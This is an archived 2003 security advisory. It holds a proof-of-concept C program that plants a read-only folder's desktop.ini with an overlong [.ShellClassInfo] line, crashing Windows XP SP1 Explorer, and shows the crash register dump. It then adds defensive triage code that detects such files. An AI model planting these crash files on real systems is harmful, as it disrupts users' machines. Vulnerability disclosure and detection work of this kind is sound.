This bug allows a malicious attacker to execute data with the privileges of a user that is browsing the hard disk with Explorer. Tested against WinXP SP1; example code provided.

```c
/*
 * Buffer Overflow in explorer.exe - Proof of Concept
 * Tested only against: Windows XP SP1
 * Found by aT4rat_private
 *
 * Greetings to:
 *   - #Haxorcitos@efnet = { "Tarako", "Croulder", "Drakar", "[back]", "tyr" }
 *   - #localhost and #darknet
 *
 * Usage: just execute this file. This code will crash your explorer every
 * time you try to browse your hard disk. Execute this program again to
 * delete the evil file ;-)
 *
 * (3ec.464): Access violation - code c0000005 (first chance)
 * First chance exceptions are reported before any exception handling.
 * This exception may be expected and handled.
 * eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70 edi=000ece90
 * eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0         nv up ei pl zr na po nc
 * cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
 * 00410041 ?? ???
 *
 * 3W Design Security 2003. http://www.3WDesign.es/
 */
#include <direct.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <sys/stat.h>

#define BUFF 2300

int main(void)
{
    char path[256];
    char evil[BUFF + 1] = "";
    FILE *bof;
    struct stat st;

    printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... .. .\n"
           " . .. ...: \tProof of Concept (aT4rat_private)\t:... .. .\n\n");

    /* Create the folder that will carry the malicious desktop.ini */
    strcpy(path, "\\aT4r[at]3WDesign.es Security");
    mkdir(path);
    /* Explorer only honours a folder's desktop.ini when the folder is
     * marked read-only (or system) */
    SetFileAttributesA(path, FILE_ATTRIBUTE_READONLY);
    strcat(path, "\\desktop.ini");

    /* Second run: the file already exists, so remove it and quit.
     * Just execute this program twice to remove the file :P */
    if (stat(path, &st) == 0) {
        remove(path);
        exit(1);
    }

    bof = fopen(path, "w");
    if (bof == NULL) {
        perror("fopen");
        return 1;
    }
    /* Section header Explorer parses, followed by BUFF bytes of 'A' (0x41) */
    fputs("[.ShellClassInfo]\n", bof);
    memset(evil, 'A', BUFF);
    fputs(evil, bof);
    fclose(bof);

    printf("evil file: %s Created. Try to browse your Harddisk O:-)\n", path);
    return 0;
}
```
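The register dump above shows eax, ebp and eip all equal to 0x00410041. In little-endian memory that dword is the bytes 41 00 41 00, which is what two 'A' bytes (0x41) look like after being widened to UTF-16LE; this suggests the overlong value reached the stack frame through an ANSI-to-Unicode conversion (an inference from the dump, not something the post states). The following is an added example, not code from aT4r's post: two triage helpers a responder might use for this bug. shellclassinfo_max_line_len() parses a desktop.ini buffer and reports the longest line under [.ShellClassInfo], so oversized files can be flagged on a scanned volume; eip_is_widened_fill() checks whether a faulting EIP is two copies of the PoC's fill byte widened to UTF-16LE. The benign desktop.ini sample is constructed here, and the 260-byte (MAX_PATH) threshold is an assumption, not a value from the post.

```c
/* Added example (not from aT4r's post): triage helpers for the desktop.ini
 * overflow. The 260-byte threshold (MAX_PATH) is an assumption. */
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define INI_LINE_THRESHOLD 260   /* assumed: longer than any sane desktop.ini line */

/* Case-insensitive test for a "[name]" header (Windows INI names are
 * case-insensitive). `line` is not NUL-terminated; `len` excludes CR/LF. */
static int line_is_section(const char *line, size_t len, const char *name)
{
    size_t n = strlen(name), i;
    if (len != n + 2 || line[0] != '[' || line[len - 1] != ']')
        return 0;
    for (i = 0; i < n; i++)
        if (tolower((unsigned char)line[1 + i]) != tolower((unsigned char)name[i]))
            return 0;
    return 1;
}

/* Longest line (bytes, CR/LF excluded) inside [.ShellClassInfo].
 * Returns 0 when the section is absent or empty. */
size_t shellclassinfo_max_line_len(const char *ini)
{
    const char *p = ini;
    int in_section = 0;
    size_t max_len = 0;

    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len && p[len - 1] == '\r')
            len--;                                   /* tolerate CRLF */
        if (len >= 2 && p[0] == '[' && p[len - 1] == ']')
            in_section = line_is_section(p, len, ".ShellClassInfo");
        else if (in_section && len > max_len)
            max_len = len;
        if (!nl)
            break;
        p = nl + 1;
    }
    return max_len;
}

/* 1 if any [.ShellClassInfo] line exceeds `threshold`, else 0. */
int desktop_ini_oversized(const char *ini, size_t threshold)
{
    return shellclassinfo_max_line_len(ini) > threshold;
}

/* A run of `fill` bytes converted to UTF-16LE becomes "fill 00 fill 00 ...";
 * read as a little-endian dword that is (fill << 16) | fill, so 'A' (0x41)
 * gives 0x00410041, the value sitting in eip/ebp/eax in the crash dump. */
int eip_is_widened_fill(uint32_t eip, unsigned char fill)
{
    return eip == (((uint32_t)fill << 16) | fill);
}

/* Build PoC-style contents into buf: the header line plus fill_len fill bytes.
 * Returns bytes written (excluding NUL), or 0 if buf is too small. */
size_t build_overflow_ini(char *buf, size_t cap, unsigned char fill, size_t fill_len)
{
    static const char hdr[] = "[.ShellClassInfo]\n";
    size_t hl = sizeof hdr - 1;
    if (cap < hl + fill_len + 1)
        return 0;
    memcpy(buf, hdr, hl);
    memset(buf + hl, fill, fill_len);
    buf[hl + fill_len] = '\0';
    return hl + fill_len;
}

/* Build the PoC file with 'A' fill in a static buffer and measure it. */
size_t poc_max_line_len(size_t fill_len)
{
    static char buf[4096];
    if (!build_overflow_ini(buf, sizeof buf, 'A', fill_len))
        return 0;
    return shellclassinfo_max_line_len(buf);
}

/* Constructed sample: a benign desktop.ini of the kind Windows itself writes. */
const char BENIGN_INI[] =
    "[.ShellClassInfo]\r\n"
    "IconResource=C:\\Windows\\System32\\shell32.dll,3\r\n"
    "[ViewState]\r\n"
    "Mode=\r\n";

int main(void)
{
    printf("benign max line: %zu, oversized=%d\n",
           shellclassinfo_max_line_len(BENIGN_INI),
           desktop_ini_oversized(BENIGN_INI, INI_LINE_THRESHOLD));
    printf("PoC    max line: %zu\n", poc_max_line_len(2300));
    printf("eip 0x00410041 is widened 'A','A': %d\n",
           eip_is_widened_fill(0x00410041u, 'A'));
    return 0;
}
```

The scanner measures whole lines rather than parsed key/value pairs because the PoC writes no '=' at all; Explorer's parser still reads the line, so any length check has to as well.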
This archive was generated by hypermail 2b30 : Thu May 08 2003 - 09:12:00 PDT